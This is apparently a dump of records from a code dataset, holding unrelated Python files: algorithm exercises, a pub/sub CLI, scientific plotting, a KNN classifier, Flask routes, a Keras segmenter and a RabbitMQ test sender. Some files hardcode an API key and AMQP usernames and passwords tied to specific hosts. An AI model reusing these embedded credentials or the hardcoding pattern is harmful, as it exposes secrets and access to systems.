heapq\n\nfood_times= [8,6,4] \nk = 15\n# def solution(food_times, k):\n # 전체 음식을 먹는 시간보다 k가 크거나 같다면 -1\nif sum(food_times) <=k :\n print(-1)\n\n # 시간이 작은 음식부터 빼야 하므로 우선순위 큐를 이용\nq =[]\nfor i in range(len(food_times)):\n # (음식시간, 음식번호) 형태로 우선순위 큐에 삽입\n heapq.heappush(q,(food_times[i],i+1)) # foodtimes 를 기준으로 정렬됨\n \nsum_value =0 # 먹기 위해 사용한 시간 \nprevious =0 # 직전에 다먹은 음식시간\nlength = len(food_times)# 남은 음식 개수\n\n # sum_value +(현재의 음식 시간+ 이전 음식 시간)* 현재 음식 개수와 k비교\nwhile sum_value+((q[0][0]- previous)* length) <=k:\n now = heapq.heappop(q)[0]\n sum_value += (now- previous) * length # 이전음식 먹은 시간만큼 지금 음식도 없어졌을테니까 \n length -= 1 # 다먹은 음식 제외\n previous = now # 이전 음식 시간 재설정\n\n # 남은 음식중에서 몇 번째 음식인지 확인하여 출력\nresult = sorted(q,key= lambda x : x[1]) # 음식의 번호 기준으로 정렬\nprint(result[(k- sum_value)% length][1])\n\n \n","sub_path":"이코테/greedy/실전문제/6.무지의먹방라이브.py","file_name":"6.무지의먹방라이브.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"59642602","text":"#!/usr/bin/env /usr/local/bin/python /usr/bin/python\n# encoding: utf-8\n# FileName: PubSub.py\n#\n# CS6381 Assignment\n# Group member: Peng Manyao, Li Yingqi, Zhou Minhui, Zhuangwei Kang\n#\n\nfrom Broker import Broker\nfrom Subscriber import Subscriber\nfrom Publisher import Publisher\nimport time\n\npubsub_version = '0.1'\npubsub_info = 'Dev MyPublisher/MySubscriber system based on ZeroMQ'\n\n\ndef help():\n print('pubsub: ')\n print('usage: pubsub [opt] [argv]')\n print('usage: pubsub -h')\n print('usage: pubsub -v')\n print('****************************')\n print(' pub -r [address] -P [port] -t [topic] # register publisher to an address with a port number'\n 'and set its initial topic')\n print(' pub send -t [topic] -p [publication] # send publication with topic')\n print(' pub -d [topic] # drop a topic')\n print(' pub shutoff')\n print('****************************')\n print(' broker -l [xsubsocket port] [xpubsocket port] # listen connections at these two ports')\n print('****************************')\n print(' sub -r [address] -P [port] -t [topic] -h [history samples count] # register subscriber to an '\n 'address with a port number and set its initial topic and history samples count')\n\n print('****************************')\n print('exit # exit program')\npub = None\nbroker = None\nsub = None\n\n\ndef parse(argv):\n opt = argv[0]\n global pub\n global broker\n global sub\n if opt == 'pub':\n if argv[1] == '-r' and argv[3] == '-P' and argv[5] == '-t':\n if pub is None:\n address = argv[2]\n port = argv[4]\n topic = argv[6]\n pub = Publisher(address, port, topic)\n if pub.register_handler():\n return True\n else:\n return False\n else:\n print('You already registered a publisher.')\n return False\n elif argv[1] == 'send' and argv[2] == '-t' and argv[4] == '-p':\n if pub is None:\n print('Please register a publisher firstly.')\n return False\n else:\n topic = argv[3]\n publication = ' '.join(argv[5:])\n pub.send_pub(topic, publication)\n elif argv[1] == '-d':\n if pub is None:\n print('Please register a publisher firstly.')\n return False\n else:\n topic = argv[2]\n pub.drop_topic(topic)\n elif argv[1] == 'shutoff':\n if pub is None:\n print('Please register a publisher firstly.')\n return False\n else:\n pub.shutoff()\n return True\n else:\n print('Illegal command.')\n return False\n\n elif opt == 'broker':\n if argv[1] == '-l':\n xsubport = argv[2]\n xpubport = argv[3]\n broker = Broker(xsubport, xpubport)\n broker.handler()\n else:\n print('Illegal command.')\n return False\n\n elif opt == 'sub':\n if argv[1] == '-r' and argv[3] == '-P' and argv[5] == '-t' and argv[7] == '-h':\n address = argv[2]\n port = argv[4]\n topic = argv[6]\n count = argv[8]\n sub = Subscriber(address, port, topic, count)\n sub.prepare()\n sub.handler()\n else:\n print('Illegal command.')\n return False\n else:\n print('Illegal command.')\n return False\n\n\nif __name__ == '__main__':\n\n while True:\n time.sleep(0.1)\n lcmd = raw_input('PubSub>> ')\n if lcmd == 'exit':\n break\n try:\n lcmd = lcmd.split()\n if lcmd[0] != 'pubsub':\n print('Illegal command.')\n continue\n opt = lcmd[1]\n\n # help info and version info\n if opt == '-h' or opt == 'help':\n help()\n continue\n elif opt == '-v' or opt == 'version':\n print('PubSub current version is: %s' % pubsub_version)\n print('PubSub info is: %s' % pubsub_info)\n continue\n ret = parse(lcmd[1:])\n if ret is False:\n print('Service failed.')\n except IndexError:\n print('Illegal command.')\n","sub_path":"Assignment1/SourceCode/PubSub.py","file_name":"PubSub.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522154215","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport sys\nsys.path.append('./method')\nimport os\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport pints.io\nimport pints.plot\nfrom scipy.interpolate import interp1d\nfrom scipy.stats import norm as scipy_stats_norm\n\n\"\"\"\nPosterior predictives with different discrepancy models.\n\nThis script plots the cached posterior predictives generated by `posterior.py`,\n`posterior-gp.py`, and `posterior-arma.py`.\n\"\"\"\n\nmodel_list = ['A', 'B', 'C']\npredict_list = ['sinewave', 'staircase', 'ap']\ndiscrepancy_list = ['', '-gp', '-gp-ov', '-arma_2_2']\nload_list = ['-iid', '-gp', '-gp', '-armax']\ndiscrepancy_names = ['iid noise', 'GP(t)', 'GP(O, V)', 'ARMA(2, 2)']\n\ntry:\n which_model = sys.argv[1] \n which_predict = sys.argv[2]\nexcept:\n print('Usage: python %s [str:which_model]' % os.path.basename(__file__)\n + ' [str:which_predict]')\n sys.exit()\n\nif which_model not in model_list:\n raise ValueError('Input model %s is not available in the model list' \\\n % which_model)\n\nif which_predict not in predict_list:\n raise ValueError('Input data %s is not available in the predict list' \\\n % which_predict)\n\ninfo_id = 'model_%s' % which_model\nsavedir = './fig/compare'\nif not os.path.isdir(savedir):\n os.makedirs(savedir)\nsaveas = 'compare-' + info_id + '-sinewave-%s-pp' % which_predict\n\nif which_predict == 'sinewave':\n zoom = [-1250, 800]\nelif which_predict == 'staircase':\n zoom = [-600, 1600]\nelif which_predict == 'ap':\n zoom = [-200, 4200]\n\ndata_dir = './data'\ndata_file_name = 'data-%s.csv' % which_predict\nprint('Predicting ', data_file_name)\n\n# Load data\ndata = np.loadtxt(data_dir + '/' + data_file_name,\n delimiter=',', skiprows=1) # headers\ntimes = data[:, 0]\ndata = data[:, 1]\n\n# Load protocol\nprotocol = np.loadtxt('./protocol-time-series/%s.csv' % which_predict,\n skiprows=1, delimiter=',')\nprotocol_times = protocol[:, 0]\nprotocol = protocol[:, 1]\nvoltage = interp1d(protocol_times, protocol, kind='linear')(times)\n\n# Load cached posterior prediction\ntimes_list = []\nppc_mean_list = []\nppc_sd_list = []\nppc_model_mean_list = []\nppc_model_sd_list = []\nppc_disc_mean_list = []\nppc_disc_sd_list = []\nfor i, (d, l) in enumerate(zip(discrepancy_list, load_list)):\n loaddir = './fig/mcmc-' + info_id + d + '/raw'\n loadas = info_id + '-sinewave-' + which_predict\n times_list.append(np.loadtxt('%s/%s-pp-time.txt' % (loaddir, loadas)))\n\n ppc_mean_list.append(np.loadtxt('%s/%s-pp%s-mean.txt'\n % (loaddir, loadas, l)))\n ppc_sd_list.append(np.loadtxt('%s/%s-pp%s-sd.txt' % (loaddir, loadas, l)))\n\n ppc_model_mean_list.append(np.loadtxt('%s/%s-pp-only-model-mean.txt'\n % (loaddir, loadas)))\n ppc_model_sd_list.append(np.loadtxt('%s/%s-pp-only-model-sd.txt'\n % (loaddir, loadas)))\n\n ppc_disc_mean_list.append(np.loadtxt('%s/%s-pp-only%s-mean.txt'\n % (loaddir, loadas, l)))\n ppc_disc_sd_list.append(np.loadtxt('%s/%s-pp-only%s-sd.txt'\n % (loaddir, loadas, l)))\n\nn_sd = scipy_stats_norm.ppf(1. - .05 / 2.)\n\n# Plot model + discrepancy\nif (which_model == 'A') and (which_predict in ['sinewave', 'staircase']):\n fig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 5),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\n axes[0].plot(times, voltage, c='#7f7f7f')\n axes[0].set_ylabel('Voltage\\n(mV)')\n axes[0].set_title('ODE model with discrepancy', loc='left')\n axes[0].set_xlim((times[0], times[-1]))\n for i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_mean_list[i]\n ppc_sd = ppc_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data, alpha=0.5, c='#7f7f7f', label='Data')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d)# + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,)\n #label=d + ' 95% C.I.')\n if which_predict in ['sinewave']:\n axes[i + 1].legend(loc=3)\n elif which_predict in ['staircase']:\n axes[i + 1].legend(loc=2, ncol=2)\n axes[i + 1].set_ylabel('Current\\n(pA)')\n axes[i + 1].set_ylim(zoom)\n axes[i + 1].set_xlim((times[0], times[-1]))\n # Add arrows...\n if which_predict == 'staircase':\n for i in range(1, 5):\n axes[i].annotate(\"\", xy=(2500, 200), xytext=(3250, 600),\n arrowprops=dict(arrowstyle=\"->\", color='#cb181d'))\n axes[i].annotate(\"\", xy=(14750, 200), xytext=(14750, 1050),\n arrowprops=dict(arrowstyle=\"->\", color='#cb181d'))\n axes[2].annotate(\"\", xy=(7550, 500), xytext=(8300, 900),\n arrowprops=dict(arrowstyle=\"->\", color='#0570b0'))\n axes[-1].set_xlabel('Time (ms)')\n plt.subplots_adjust(hspace=0)\n plt.savefig('%s/%s' % (savedir, saveas), dpi=200, bbox_inches='tight')\n plt.close()\nelse:\n fig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 8),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\n axes[0].plot(times, voltage, c='#7f7f7f')\n axes[0].set_ylabel('Voltage (mV)')\n axes[0].set_title('ODE model with discrepancy', loc='left')\n for i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_mean_list[i]\n ppc_sd = ppc_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data, alpha=0.5, c='#7f7f7f', label='Data')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,\n label=d + ' 95% C.I.')\n axes[i + 1].legend()\n axes[i + 1].set_ylabel('Current (pA)')\n axes[i + 1].set_ylim(zoom)\n axes[-1].set_xlabel('Time (ms)')\n plt.subplots_adjust(hspace=0)\n plt.savefig('%s/%s' % (savedir, saveas), dpi=200, bbox_inches='tight')\n plt.close()\n\n# Plot model only\nfig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 8),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\naxes[0].plot(times, voltage, c='#7f7f7f')\naxes[0].set_ylabel('Voltage (mV)')\naxes[0].set_title('ODE model only', loc='left')\nfor i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_model_mean_list[i]\n ppc_sd = ppc_model_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data, alpha=0.5, c='#7f7f7f', label='Data')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,\n label=d + ' 95% C.I.')\n axes[i + 1].legend()\n axes[i + 1].set_ylabel('Current (pA)')\n axes[i + 1].set_ylim(zoom)\naxes[-1].set_xlabel('Time (ms)')\nplt.subplots_adjust(hspace=0)\nplt.savefig('%s/%s-only-model' % (savedir, saveas), dpi=200,\n bbox_inches='tight')\nplt.close()\n\n# Plot discrepancy only\nfig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 8),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\naxes[0].plot(times, voltage, c='#7f7f7f')\naxes[0].set_ylabel('Voltage (mV)')\naxes[0].set_title('Discrepancy only', loc='left')\nfor i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_disc_mean_list[i]\n ppc_sd = ppc_disc_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data - ppc_model_mean_list[i], alpha=0.5,\n c='#7f7f7f', label='Data - ODE model')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,\n label=d + ' 95% C.I.')\n axes[i + 1].legend()\n axes[i + 1].set_ylabel('Current (pA)')\n #axes[i + 1].set_ylim(zoom)\naxes[-1].set_xlabel('Time (ms)')\nplt.subplots_adjust(hspace=0)\nplt.savefig('%s/%s-only-disc' % (savedir, saveas), dpi=200,\n bbox_inches='tight')\nplt.close()\n","sub_path":"ion-channel-models/compare-pp.py","file_name":"compare-pp.py","file_ext":"py","file_size_in_byte":8572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"23347940","text":"print(\"#Тестирование API\")\n\n\nfrom requests import Request, Session\nimport json\nfrom datetime import datetime \n\nurl = 'https://sandbox-api.coinmarketcap.com/v1/cryptocurrency/listings/latest' #песочница\n\nparameters = {\n 'start':'1',\n 'limit':'10',\n 'convert':'USD',\n 'sort_dir':\"desc\"\n}\nheaders = {\n 'Accepts': 'application/json',\n 'X-CMC_PRO_API_KEY': 'b54bcf4d-1bca-4e8e-9a24-22ff2c3d462c', #ключ для песочницы\n \n}\n\nsession = Session()\nsession.headers.update(headers)\n\ntry:\n response = session.get(url, params=parameters)\n json_data = json.loads(response.text)\n print(\"Запрос на url:\",response.url)\n\nexcept (ConnectionError, Timeout, TooManyRedirects) as e:\n print(e)\n\nprint(\"Код ответа:\", response.status_code)\nassert response.status_code == 200\n\nprint(\"Время ответа :\", response.elapsed.total_seconds()*1000, \"мс\")\nassert response.elapsed.total_seconds()*1000 <= 500, response.elapsed.total_seconds()*1000\n\nprint(\"Размер пакета данных:\", len(response.content),\"байт\")\nassert len(response.content) < 10*1024\n\n\nfor each in json_data['data']:\n print(\"Наименование валюты:\", each['name'])\n print(\"дата последнего обновления:\", each['last_updated'].split(\"T\")[0])\n\n\n\ntoday = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\nprint(\"Текущая дата:\",today)\n#assert today == each['last_updated'].split(\"T\")[0], each['last_updated'].split(\"T\")[0]\n\nprint(\"данные по запросу записаны в файл:file_response.text \")\nfile_data = open('file_response.text', 'wb')\nfile_data.write(response.content)\nfile_data.close()\n\n\nprint(\"Успешно\")\n","sub_path":"API_test1.py","file_name":"API_test1.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"598815927","text":"# coding:utf8\r\nimport sys\r\nimport numpy as np\r\nimport math\r\nimport operator\r\n\r\n\r\nK = 5 # you can choose another K value'''\r\n\r\ndef euclideanDistance(instance1, instance2, length):#计算两点之间的欧式距���\r\n distance=0\r\n for x in range(length):#这里的length是指实例有几项,对应于特征向量的维度\r\n distance += pow((instance1[x]-instance2[x]),2)\r\n return math.sqrt(distance)\r\n\r\ndef getNeighbors(trainingSet,testInstance,K):#获取离样本点最近的k个训练实例点\r\n neighbors = []#离样本点最近的k个训练实例点的列表\r\n distance=[]#由训练实例及其与样本点的欧氏距离组成的列表\r\n length=len(testInstance)-1#-1,因为测试集里面是有类标签的\r\n for x in range(len(trainingSet)):\r\n dist=euclideanDistance(testInstance,trainingSet[x],length)\r\n distance.append([trainingSet[x],dist])\r\n distance.sort(key=operator.itemgetter(1))\r\n for x in range(K):\r\n neighbors.append(distance[x][0])#存储的是前k个训练实例点的distance列表中的(trainingSet[x])\r\n return neighbors\r\n\r\ndef getResponse(neighbors):#获取k个训练实例点的最多的类\r\n neighborsLabel={}#字典中对应的键值对是类别及数量\r\n for x in range(len(neighbors)):\r\n response=neighbors[x][-1]#训练实例点的最后一个属性,即类标记\r\n if response in neighborsLabel:#遍历k个训练实例点的response,如果在字典中,就加1,不在的话更新这个值为1\r\n neighborsLabel[response]+=1\r\n else:\r\n neighborsLabel[response]=1\r\n sortedVotes=sorted(neighborsLabel.iteritems(),key=operator.itemgetter(1),reverse=True)#将字典以迭代器对象返回,并按类的数量进行降序排序\r\n return sortedVotes[0][0]#返回列表里第一项的类别\r\n\r\ndef getAccuracy(testSet,answer):#计算准确度\r\n correct=0#表示测试集中预测正确的个数\r\n for x in range(len(testSet)):\r\n if testSet[x][-1] == answer[x]:#如果预测的类标签与实际的类标签相同,则预测正确的个数加1\r\n correct += 1\r\n return (correct/float(len(testSet)))*100.0\r\n\r\ndef classify():\r\n # training\r\n trainingSet=[]\r\n with open('./training.txt') as f:\r\n for line in f:\r\n trainingSet.append(line.split(','))\r\n for x in range(len(trainingSet)):\r\n for y in range(4):\r\n trainingSet[x][y]= float(trainingSet[x][y])\r\n # you can add your core code here\r\n\r\n # test\r\n testSet=[]\r\n with open('./test.txt') as f:\r\n for line in f:\r\n testSet.append(line.split(','))\r\n for x in range(len(testSet)):\r\n for y in range(4):\r\n testSet[x][y] = float(testSet[x][y])\r\n # add your code here\r\n\r\n answer=[]\r\n for x in range(len(testSet)):\r\n neighbors=getNeighbors(trainingSet,testSet[x],K)\r\n result=getResponse(neighbors)\r\n answer.append(result)\r\n print(repr(testSet[x])+'>predicted='+repr(result))\r\n accuracy=getAccuracy(testSet,answer)\r\n print ('Accuracy:'+repr(accuracy)+'%')\r\nif __name__ == '__main__':\r\n classify()\r\n","sub_path":"assignment 101/LuZhenni/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"460997487","text":"from flask import Flask, render_template, redirect, url_for, request, make_response\nfrom TheatreHopper import *\nfrom pprint import pprint\nfrom app import app\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef page():\n options = {}\n theatres, links = getTheatres()\n theatresLinks = [(theatres[i], links[i]) for i in xrange(len(theatres))]\n options[\"theatreList\"] = theatresLinks\n #print \"made it this far\"\n #raise IndexError\n #print request\n if request.form:\n # print request.form\n if \"theatre\" in request.form:\n url, soup = getShowtimesPage(request.form[\"theatre\"])\n dates, urls = getDates(soup, url)\n dateList = [(dates[i], urls[i]) for i in xrange(len(dates))]\n options[\"dates\"] = dateList\n if \"dates\" in request.form:\n #print request.form[\"dates\"]\n showtimes = getShowtimes(None, url=request.form[\"dates\"])\n #print showtimes\n hops = findHops(showtimes, int(request.form[\"maxWait\"]))\n #pprint(hops)\n marathons = findMovieMarathons(hops)\n removeDuplicates(marathons, [])\n options[\"marathons\"] = marathons\n #display(marathons, 0)\n #print request.form[\"dates\"] \n return make_response(render_template('index.html', **options))","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"566491368","text":"import pika\nfrom lsst.ctrl.iip.Consumer import Consumer\nfrom lsst.ctrl.iip.SimplePublisher import SimplePublisher\nimport sys\nimport os\nimport pprint\nimport copy\nimport time\nimport logging\nimport _thread\n\nclass Premium:\n def __init__(self):\n logging.basicConfig()\n #os.system('rabbitmqctl -p /tester purge_queue firehose')\n #os.system('rabbitmqctl -p /tester purge_queue ack_publish')\n self.sp2 = SimplePublisher('amqp://TEST1:TEST1@141.142.238.160:5672/%2Fbunny', \"YAML\")\n time.sleep(3)\n broker_url = 'amqp://BASE:BASE@141.142.238.160:5672/%2Fbunny'\n #broker_url = 'amqp://NCSA:NCSA@141.142.208.191:5672/%2Ftester'\n #broker_url = 'amqp://Fm:Fm@141.142.208.191:5672/%2Fbunny'\n #self._cons = FirehoseConsumer(broker_url, 'firehose', \"YAML\")\n self._cons = Consumer(broker_url, 'f1_consume', \"YAML\")\n #self._cons = Consumer(broker_url, 'pp_foreman_consume', \"YAML\")\n self._cons2 = Consumer(broker_url, 'ncsa_consume', \"YAML\")\n try:\n _thread.start_new_thread( self.do_it, (\"thread-1\", 2,) )\n except e:\n print(\"Cannot start thread\")\n print(e)\n \n try:\n _thread.start_new_thread( self.do_it2, (\"thread-2\", 2,) )\n except e:\n print(\"Cannot start thread\")\n print(e)\n \n def mycallback(self, ch, methon, properties, body):\n print(\" \")\n print(\"+++++++++++++=========++++++++++++++++\")\n print(\" f1_consume msg:\")\n print(body)\n\n\n def mycallback2(self, ch, methon, properties, body):\n print(\" \")\n print(\">>>>>>>>>>>>>>><<<<<<<<<<<<<<<<\")\n print(\" f2_consume msg:\")\n print (body)\n if body['MSG_TYPE'] == 'NEXT_VISIT':\n return\n msg = {}\n msg['ACK_ID'] = body['ACK_ID']\n msg['MSG_TYPE'] = 'NCSA_START_INTEGRATION_ACK'\n msg['COMPONENT_NAME'] = 'NCSA_FOREMAN'\n fwdrs = copy.deepcopy(body['FORWARDERS'])\n pp = pprint.PrettyPrinter(indent=2)\n print(\"In callback2, fwdrs dict is:\")\n pp.pprint(fwdrs)\n fwdrs_keys = list(fwdrs.keys())\n i = 1\n for fwdr in fwdrs_keys:\n dists = {}\n dists['FQN'] = \"Distributor_\" + str(i)\n dists['NAME'] = \"D\" + str(i)\n dists['HOSTNAME'] = \"D\" + str(i)\n dists['TARGET_DIR'] = \"/dev/null\"\n dists['IP_ADDR'] = \"141.142.237.16\" + str(i)\n fwdrs[fwdr]['DISTRIBUTOR'] = dists\n i = i + 1\n\n #for fwdr in fwdrs_keys:\n # dists = {}\n # dists[fwdr] = {}\n # dists[fwdr]['FQN'] = \"Distributor_\" + str(i)\n # dists[fwdr]['NAME'] = \"D\" + str(i)\n # dists[fwdr]['HOSTNAME'] = \"D\" + str(i)\n # dists[fwdr]['TARGET_DIR'] = \"/dev/null\"\n # dists[fwdr]['IP_ADDR'] = \"141.142.237.16\" + str(i)\n # fwdrs[fwdr]['DISTRIBUTOR'] = dists\n # i = i + 1\n\n msg['PAIRS'] = fwdrs\n msg['ACK_BOOL'] = True\n msg['JOB_NUM'] = body['JOB_NUM']\n msg['IMAGE_ID'] = body['IMAGE_ID']\n msg['VISIT_ID'] = body['VISIT_ID']\n msg['SESSION_ID'] = body['SESSION_ID']\n self.sp2.publish_message(\"pp_foreman_ack_publish\", msg)\n\n\n def do_it(self, threadname, delay):\n print(\"Before run call\")\n self._cons.run(self.mycallback)\n\n def do_it2(self, threadname, delay):\n print(\"Before run call\")\n self._cons2.run(self.mycallback2)\n\n \n\ndef main():\n premium = Premium()\n sp1 = SimplePublisher('amqp://BASE_PUB:BASE_PUB@141.142.238.160:5672/%2Fbunny', \"YAML\")\n #sp2 = SimplePublisher('amqp://TesT:TesT@141.142.208.191:5672/%2Ftester')\n #broker_url = 'amqp://Fm:Fm@141.142.208.191:5672/%2Fbunny'\n #cons = Consumer(broker_url, 'F8_consume')\n #try:\n # thread.start_new_thread( do_it, (\"thread-1\", 2,) )\n #except:\n # print \"Cannot start thread\"\n\n\n # while 1:\n# msg = {}\n# msg['MSG_TYPE'] = 'NEW_ARCHIVE_ITEM'\n# msg['SESSION_ID'] = \"Tues_xx417\"\n# msg['VISIT_ID'] = \"V_5512\"\n# msg['IMAGE_TYPE'] = 'AR'\n# msg['IMAGE_ID'] = \"IMG_442\"\n# msg['ACK_ID'] = \"NEW_ITEM_ACK_14\"\n# time.sleep(3)\n# sp1.publish_message(\"archive_ctrl_consume\", msg)\n\n #msg = {}\n #msg['MSG_TYPE'] = \"DISABLE\"\n #msg['DEVICE'] = 'AR'\n #time.sleep(5)\n #sp1.publish_message(\"ocs_dmcs_consume\", msg)\n\n #msg = {}\n #msg['MSG_TYPE'] = 'AR_ITEMS_XFERD'\n #msg['IMAGE_ID'] = \"IMG_442\"\n #msg['CCD_LIST'] = {'4':{ 'FILENAME':'/mnt/xfer_dir/101_100_4.fits','CHECKSUM':'348e1dbe4956e9d8d2dfa97535744561'}}\n #msg['ACK_ID'] = 'AR_ITEMS_ACK_2241'\n #time.sleep(5)\n #sp1.publish_message(\"archive_ctrl_consume\", msg)\n\n \n msg = {}\n msg['MSG_TYPE'] = \"NEW_SESSION\"\n msg['SESSION_ID'] = 'session_RZ_22'\n msg['RESPONSE_QUEUE'] = 'dmcs_consume'\n msg['ACK_ID'] = 'NEW_SESSION_ACK_14'\n time.sleep(4)\n sp1.publish_message(\"pp_foreman_consume\", msg)\n\n msg = {}\n msg['MSG_TYPE'] = \"NEXT_VISIT\"\n msg['SESSION_ID'] = 'session_RZ_22'\n msg['VISIT_ID'] = 'XX_28272'\n msg['BORE_SIGHT'] = 'A LITTLE TO THE LEFT'\n msg['RESPONSE_QUEUE'] = 'dmcs_consume'\n msg['ACK_ID'] = 'NEXT_VISIT_ACK_15'\n time.sleep(4)\n sp1.publish_message(\"pp_foreman_consume\", msg)\n\n ccd_list = [1,2,12,17,9,22,43,44,46,47,55,71,15,78,79,82,84,85]\n msg = {}\n msg['MSG_TYPE'] = \"START_INTEGRATION\"\n msg['JOB_NUM'] = '121163'\n msg['IMAGE_ID'] = 'IMG_444244'\n msg['VISIT_ID'] = 'VV1X004'\n msg['SESSION_ID'] = 'session_RZ_22'\n msg['CCD_LIST'] = ccd_list\n \n msg['RESPONSE_QUEUE'] = 'dmcs_ack_consume'\n msg['ACK_ID'] = 'S_I_ACK_16'\n time.sleep(4)\n sp1.publish_message(\"pp_foreman_consume\", msg)\n time.sleep(7)\n\n #msg = {}\n #msg['MSG_TYPE'] = \"READOUT\"\n #msg['IMAGE_ID'] = 'IMG_444244'\n #msg['DEVICE'] = 'AR'\n #time.sleep(4)\n #sp1.publish_message(\"ocs_dmcs_consume\", msg)\n \n\n print(\"Sender done\")\n\n\n #sp2.publish_message(\"ack_publish\", \"No, It's COLD\")\n #time.sleep(2)\n #pass\n\n\n\nif __name__ == \"__main__\": main()\n","sub_path":"test_scripts/pp_sender.py","file_name":"pp_sender.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"1926380","text":"import skimage.io as io\nfrom . import unet\nimport numpy as np\nimport os\nimport cv2\nfrom PIL import Image\nclass Predictor:\n def __init__(self): \n self.category = None\n self.size = None\n self.channel = None\n self.weight_path = \"SamTech/Vision/Segmenter/source/\"\n self.weight_name = None\n self.__model = None\n self.model_name = None\n\n def init_model(self, model_name, weight_path, summary = 0):\n self.__model, self.model_name = getattr(unet, model_name)(input_size = (self.size[0],self.size[1],self.channel), verbose = summary, pretrained_weights = weight_path)\n\n def summary(self):\n print ('\\nModel | {}'.format(self.model_name))\n print ('Category | {}'.format(self.category))\n print ('Weight | {}'.format(self.weight_name))\n print ('Size | {}'.format(self.size))\n print ('Color Channels | {}'.format(self.channel))\n print ('Weight Path | {}\\n'.format(self.weight_paht))\n\n def load_model(self, weight):\n path = self.weight_path + weight\n self.weight_name = weight\n weight = weight.split('-') \n self.model_name = weight[0].split('_')[0]\n self.category = weight[0].split('_')[1]\n self.size = (int(weight[1]), int(weight[2]))\n self.channel = int(weight[3])\n self.init_model(self.model_name, path)\n\n def predict(self, input_image_path, save_path = None):\n img = cv2.imread(input_image_path,0)\n img = cv2.resize(img,self.size)\n img = np.reshape(img,img.shape+(1,)) \n img = np.reshape(img,(1,)+img.shape)\n result = self.__model.predict(img)\n np_out = result[0][:,:,0]\n if save_path:\n io.imsave(save_path, np_out)\n return 1\n return np_out\n \n def segment(self, input_image_path, save_path = None):\n np_out = self.predict(input_image_path)\n img_bgr = cv2.imread(input_image_path, 1)\n img_bgr = cv2.resize(img_bgr, self.size)\n\n np_out = cv2.cvtColor(np_out,cv2.COLOR_GRAY2BGR)\n np_out = cv2.normalize(np_out, np_out, 0, 255, cv2.NORM_MINMAX).astype('uint8')\n np_out = Image.fromarray(np_out)\n\n mask_array = np.array(np_out) \n mask_array = mask_array[:, :, ::-1].copy() \n mask_out = cv2.bitwise_and(img_bgr, mask_array)\n\n if save_path:\n cv2.imwrite(save_path, mask_out)\n return 1\n return mask_out\n\nif __name__ == '__main__':\n pass","sub_path":"SamTech/Vision/Segmenter/keras_predictor.py","file_name":"keras_predictor.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"386276547","text":"from flask import Flask, render_template\nfrom blueprints.greeting import greeting_blueprint\nfrom blueprints.pie import pie_blueprint\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home(): \n return render_template('index.html')\n\napp.register_blueprint(greeting_blueprint)\napp.register_blueprint(pie_blueprint)\n\nif __name__ == '__main__': \n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"220029787","text":"name = \"Smith\" # input(\"Enter employee's name: \")\nhours = 10 